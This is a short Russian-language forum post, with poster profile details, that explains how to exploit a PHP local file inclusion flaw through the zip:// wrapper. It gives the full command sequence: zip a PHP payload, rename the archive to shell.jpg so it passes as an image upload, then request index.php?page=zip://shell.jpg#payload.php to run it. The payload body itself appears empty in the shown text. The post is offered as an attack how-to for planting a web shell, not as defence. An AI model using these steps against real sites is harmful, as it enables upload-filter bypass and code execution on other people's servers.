
30.09.2022, 13:33
|
|
Постоянный
Регистрация: 28.05.2022
Сообщений: 800
С нами:
2086530
Репутация:
0
|
|
LFI с wrapper ZIP делается примерно так:
Wrapper zip:// - Create an evil payload: echo "" > payload.php;
- Zip the file
Bash:
Код:
zip
payload.zip payload.php
;
mv
payload.zip shell.jpg
;
rm
payload.php
- Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg#payload.php
|
|
|